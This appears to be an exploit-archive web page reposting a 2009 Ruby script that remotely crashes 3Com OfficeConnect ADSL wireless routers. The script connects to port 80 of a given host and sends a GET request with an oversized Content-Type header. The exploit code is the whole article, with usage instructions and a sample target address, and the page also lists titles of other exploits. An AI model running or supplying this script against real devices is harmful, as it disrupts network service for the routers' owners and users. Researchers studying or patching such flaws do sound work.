首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
3Com OfficeConnect Routers DoS (Content-Type)
来源:http://pentbox.net/ 作者:Ortega 发布时间:2009-12-22  

###############
# Model -> Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72
# Software Version -> Tested on 2.06T13 (Apr 2007, last version for these routers)
# Attacker -> Tested from GNU/Linux (Sidux and Ubuntu) and Windows 7
#
# Exploit languaje -> Ruby
# Type -> Remote Denial of Service Exploit by HTTP
#
# Additional info:
# - The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.
#
###############
# Discovered and written by Alberto Ortega
# http://pentbox.net/
###############

require "socket"

host = ARGV[0]
buffer = "A"
send = ""

puts ""
if !host
 puts " 3Com OfficeConnect ADSL Wireless 11g Firewall Router"
 puts " Remote DoS Exploit by HTTP"
 puts " ------ Usage ---------------------------------------"
 puts " ruby 3com_dosexploit.rb host"
 puts " Ex: ruby 3com_dosexploit.rb 192.168.1.1"
else
 begin
  socket = TCPSocket.new(host, 80)
  puts "- Exploiting ..."
  # 8.times is enough to DoS
  9.times do
   buffer = "#{buffer}#{buffer}"
  end
  # Here are the HTTP packet, Content-Type value causes the DoS
  send = "GET / HTTP/1.1\r\nContent-Type:#{buffer}\r\n"
  socket.write(send)
  puts "- Successfully! :)"
 rescue
  puts "Connection problem"
 end
end
puts ""


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TLS Renegotiation Vulnerabilit
·Winamp <= 5.57 Stack Overflow
·PlayMeNow Malformed M3U Playli
·CoolPlayer 2.18 M3U Playlist B
·Simple PHP Blog <= 0.5.1 Local
·PlayMeNow Malformed (M3U) Univ
·Easy RM to MP3 27.3.700 WinXP
·TFTP Daemon v1.9 Denial of Ser
·Simple PHP Blog v0.5.1 Local F
·corehttp remote command execut
·Linux - setreuid (0,0) & execv
·linux 2.6.18-20 2009 Local Roo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved